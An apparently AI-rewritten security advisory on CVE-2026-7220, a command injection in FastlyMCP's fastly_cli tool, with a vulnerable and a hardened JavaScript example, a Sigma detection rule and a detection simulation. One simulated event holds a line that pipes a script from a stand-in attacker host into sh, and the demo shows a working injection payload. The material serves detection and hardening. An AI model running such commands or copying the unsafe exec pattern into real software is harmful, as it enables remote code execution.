CVE-2026-7220: FastlyMCP Command Injection Exposes Infrastructure

The National Vulnerability Database (NVD) has published CVE-2026-7220, a high-severity OS command injection vulnerability in jackwrichards FastlyMCP affecting all revisions up to commit 6f3d0b0e654fc51076badc7fa16c03c461f95620. The flaw sits in the fastly_cli tool of fastly-mcp.mjs: the tool's command argument reaches the operating system without sanitization, so a remote attacker who can drive that tool can execute arbitrary OS commands with the privileges of the process hosting the MCP server.

This is not a theoretical risk: a public exploit exists. The project follows a rolling release model, so there are no affected or fixed version numbers, only the commit hash above, which makes it harder to tell a patched deployment from a vulnerable one. The maintainer was notified through an issue report and has not responded, so no fix is known at the time of writing. The CVSS v3.1 base score is 7.3 (High), with a network attack vector and no privileges or user interaction required; with those metrics, 7.3 corresponds to a Low impact rating on each of confidentiality, integrity and availability, which understates what arbitrary command execution on the host usually yields.

An attacker who reaches the tool gains command execution as the account running the MCP server, on a host that holds Fastly credentials: that is initial access to the host and a route into the Fastly-managed infrastructure behind it. The absence of a clear patch path under the rolling release model is a significant operational challenge. Defenders should assume the vulnerability is actively exploitable and assess their exposure now.
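As an added illustration, not code from the FastlyMCP project and not a claim about how fastly-mcp.mjs is written, the JavaScript below shows the Node pattern that produces this class of finding (a tool argument interpolated into a string that child_process.exec hands to /bin/sh) next to a hardened version that validates the argument into an argv array and runs the binary with execFile, so no shell is involved. The function names, the subcommand allowlist, the token pattern and the sample payload are assumptions; the demo uses echo in place of the real fastly binary so nothing real is invoked.

```javascript
// Added example, not the FastlyMCP project's code. Names, allowlist and
// payloads are assumptions chosen to illustrate the bug class.

// VULNERABLE PATTERN: the tool argument is interpolated into one string that
// child_process.exec hands to `/bin/sh -c`, so `;`, `|`, `$( )`, backticks and
// `&&` inside the argument are executed as shell syntax, not passed to fastly.
function buildShellCommandUnsafe(command, binary = "fastly") {
  return `${binary} ${command}`;
}

async function runFastlyUnsafe(command, binary = "fastly") {
  const { execSync } = await import("node:child_process");
  return execSync(buildShellCommandUnsafe(command, binary), { encoding: "utf8" });
}

// HARDENED: no shell at all. Split the argument into argv tokens, accept only
// an allowlisted subcommand and plain tokens, then run the binary with
// execFile, which passes argv straight to the kernel. A token such as `$(id)`
// is refused here; even a token that slipped through would reach `fastly` as a
// literal argument, never a shell.
const ALLOWED_SUBCOMMANDS = new Set(["service", "backend", "domain", "version", "whoami"]); // assumed
const SAFE_TOKEN = /^[A-Za-z0-9_@.:=\/-]+$/; // letters, digits and punctuation common in CLI args

function parseFastlyArgs(command) {
  const tokens = String(command).trim().split(/\s+/).filter(Boolean);
  if (tokens.length === 0) throw new Error("empty command");
  if (!ALLOWED_SUBCOMMANDS.has(tokens[0])) throw new Error(`subcommand not allowed: ${tokens[0]}`);
  for (const t of tokens) {
    if (!SAFE_TOKEN.test(t)) throw new Error(`rejected token: ${JSON.stringify(t)}`);
  }
  return tokens;
}

// true when the validator refuses the argument (used by the demo and checks)
function isRejected(command) {
  try { parseFastlyArgs(command); return false; } catch { return true; }
}

async function runFastlySafe(command, binary = "fastly") {
  const argv = parseFastlyArgs(command); // throws before anything is executed
  const { execFileSync } = await import("node:child_process");
  return execFileSync(binary, argv, { encoding: "utf8" });
}

// Demo with `echo` standing in for the fastly binary: the unsafe path prints
// the injected second command, the safe path refuses the payload.
async function demo() {
  const payload = "service list; echo INJECTED";
  console.log("unsafe :", JSON.stringify(await runFastlyUnsafe(payload, "echo")));
  try {
    await runFastlySafe(payload, "echo");
  } catch (e) {
    console.log("safe   : refused ->", e.message);
  }
  console.log("safe   :", JSON.stringify(await runFastlySafe("service list --json", "echo")));
}

if (typeof require !== "undefined" && require.main === module) {
  demo().catch((e) => console.error("demo failed:", e.message));
}
```

execFile removes shell interpretation but not argument injection: a token that passes the pattern, such as --file=/etc/passwd, still reaches the CLI as a flag, so the allowlist should cover the flags as well as the subcommands the tool is meant to expose.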

What This Means For You

  • If your operations rely on jackwrichards FastlyMCP, you are directly exposed: this is a command injection flaw with a public exploit and no clear patch. Identify every instance of the tool in your environment (MCP client configurations that register it, and node processes running fastly-mcp.mjs), then apply immediate mitigations: isolate the host on the network, run the server under a dedicated low-privilege account with a minimally scoped Fastly token, or stop using the tool until a fix has been verified against the commit hash above. Treat any compromised instance as a pivot point into your Fastly-managed infrastructure.

🛡️ Detection Rules

Three detection rules were auto-generated for this advisory and mapped to MITRE ATT&CK; the first is reproduced below as Sigma YAML. It is marked experimental: test it against a lab deployment of the tool before relying on it.

Level: high · ATT&CK: T1059.004 (Command and Scripting Interpreter: Unix Shell) · Tactic: Execution

Sigma YAML
title: CVE-2026-7220: FastlyMCP Command Injection via 'command' argument
id: scw-2026-04-28-ai-1
status: experimental
level: high
description: |
  Detects likely exploitation of CVE-2026-7220 in FastlyMCP (fastly-mcp.mjs, fastly_cli tool),
  which allows OS command injection through the tool's 'command' argument. The injected value
  arrives over the MCP transport, not on the node process's own command line, so it only
  becomes visible in process telemetry when the tool hands it to a shell. This rule therefore
  looks for a shell (sh, bash or dash) spawned by a node process that is running fastly-mcp,
  whose command line invokes fastly and carries shell metacharacters. It assumes the tool runs
  the Fastly CLI through a shell (child_process.exec or equivalent), which is what makes the
  metacharacters in the argument executable in the first place.
author: SCW Feed Engine (AI-generated)
date: 2026-04-28
references:
  - https://shimiscyberworld.com/posts/nvd-CVE-2026-7220/
tags:
  - attack.execution
  - attack.t1059.004
logsource:
  category: process_creation
detection:
  # the MCP server process, wherever node is installed (/usr/local/bin, nvm, ...)
  selection_parent:
    ParentImage|endswith: '/node'
    ParentCommandLine|contains: 'fastly-mcp'
  # the shell the tool spawns to run the Fastly CLI
  selection_shell:
    Image|endswith:
      - '/sh'
      - '/bash'
      - '/dash'
    CommandLine|contains: 'fastly'
  # shell syntax that a plain CLI argument has no reason to contain
  selection_inject:
    CommandLine|contains:
      - '&&'
      - ';'
      - '|'
      - '`'
      - '$('
  condition: all of selection_*
falsepositives:
  - Legitimate administrative activity that drives the Fastly CLI through a node wrapper with pipes or chained commands
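To see what a process-creation rule for this bug actually catches, the JavaScript below (an added example, not from the page or the FastlyMCP project) evaluates two matching strategies over four constructed process_creation events: inspecting the node process's own command line for metacharacters, and matching a shell whose parent is node running fastly-mcp. Field names follow Sigma's process_creation schema; every event value is made up, and the second event assumes the tool runs the Fastly CLI through a shell.

```javascript
// Added example, not from the page or the FastlyMCP project. Field names
// follow Sigma's process_creation schema; all values below are constructed.

const SHELL_META = ["&&", ";", "|", "`", "$("];

const EVENTS = [
  // 1. The MCP server itself starting up. Its own command line is just the
  //    script path: the exploit payload never appears here.
  { Image: "/usr/local/bin/node", CommandLine: "node fastly-mcp.mjs",
    ParentImage: "/usr/bin/bash", ParentCommandLine: "bash" },
  // 2. Shell spawned by the tool for an injected 'command' (assumes the tool
  //    runs the Fastly CLI through a shell).
  { Image: "/bin/sh", CommandLine: "/bin/sh -c fastly service list; curl http://attacker.example/x | sh",
    ParentImage: "/usr/local/bin/node", ParentCommandLine: "node fastly-mcp.mjs" },
  // 3. Shell spawned for a benign tool call.
  { Image: "/bin/sh", CommandLine: "/bin/sh -c fastly service list --json",
    ParentImage: "/usr/local/bin/node", ParentCommandLine: "node fastly-mcp.mjs" },
  // 4. An administrator's own pipeline, not under node.
  { Image: "/bin/bash", CommandLine: "bash -c fastly service list | grep prod",
    ParentImage: "/usr/bin/zsh", ParentCommandLine: "zsh" },
];

function hasShellMeta(s) {
  return SHELL_META.some((m) => s.includes(m));
}

// Approach A: look for metacharacters on the node process's own command line.
function matchNodeCmdline(ev) {
  return ev.Image.endsWith("/node")
    && ev.CommandLine.includes("fastly-mcp")
    && hasShellMeta(ev.CommandLine);
}

// Approach B: a shell whose parent is node running fastly-mcp, invoking fastly
// with shell syntax in its command line.
function matchChildShell(ev) {
  return ev.ParentImage.endsWith("/node")
    && ev.ParentCommandLine.includes("fastly-mcp")
    && /\/(sh|bash|dash)$/.test(ev.Image)
    && ev.CommandLine.includes("fastly")
    && hasShellMeta(ev.CommandLine);
}

// Apply a matcher to a batch of events and return the hits.
function runRule(events, matcher) {
  return events.filter(matcher);
}

// Hit counts per approach: A never fires on the injected call, B fires once.
function summarize(events = EVENTS) {
  return {
    nodeCmdline: runRule(events, matchNodeCmdline).length,
    childShell: runRule(events, matchChildShell).length,
  };
}

console.log(JSON.stringify(summarize()));
```

Approach A is silent on the injected call because the payload only exists inside the MCP request and the child shell; approach B fires on event 2 alone, stays quiet on the benign tool call and on the administrator's pipeline, and would need tuning only where operators really do run fastly through node wrappers with chained commands.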


Indicators of Compromise

The entries below describe the vulnerable component rather than attacker artifacts, so they are useful for scoping inventory, not for hunting activity.

ID              Type                Indicator
CVE-2026-7220   Command Injection   jackwrichards FastlyMCP up to commit 6f3d0b0e654fc51076badc7fa16c03c461f95620
CVE-2026-7220   Command Injection   File: fastly-mcp.mjs
CVE-2026-7220   Command Injection   Component: fastly_cli Tool
CVE-2026-7220   Command Injection   Manipulation of argument 'command'
Source & Attribution

Source platform: NVD
Channel: National Vulnerability Database
Published: April 28, 2026 at 07:16 UTC

This content was AI-rewritten and enriched by Shimi's Cyber World based on the original source. All intellectual property rights remain with the original author.

Related coverage

CVE-2026-7223: BigSweetPotatoStudio HyperChat SSRF Vulnerability

CVE-2026-7223 — A vulnerability was identified in BigSweetPotatoStudio HyperChat up to 2.0.0-alpha.63. Affected by this issue is the function fetch of the file packages/core/src/http/aiProxyMiddleware.mts of...

Tags: vulnerability, CVE, high-severity, server-side-request-forgery, cwe-918 · SCW Vulnerability Desk · HIGH · CVSS 7.3

TencentCloudBase CloudBase-MCP SSRF Vulnerability (CVE-2026-7221)

CVE-2026-7221 — A vulnerability was found in TencentCloudBase CloudBase-MCP up to 2.17.0. Affected is the function openUrl of the file mcp/src/interactive-server.ts of the component open-url...

Tags: vulnerability, CVE, high-severity, server-side-request-forgery, cwe-918 · SCW Vulnerability Desk · HIGH · CVSS 7.3

Totolink N300RT: High-Severity Buffer Overflow Vulnerability (CVE-2026-7219)

CVE-2026-7219 — A flaw has been found in Totolink N300RT 3.4.0-B20250430. This affects an unknown function of the file /boafrm/formIpQoS. Executing a manipulation of the...

Tags: vulnerability, CVE, high-severity, buffer-overflow, cwe-119, cwe-120 · SCW Vulnerability Desk · HIGH · CVSS 7.2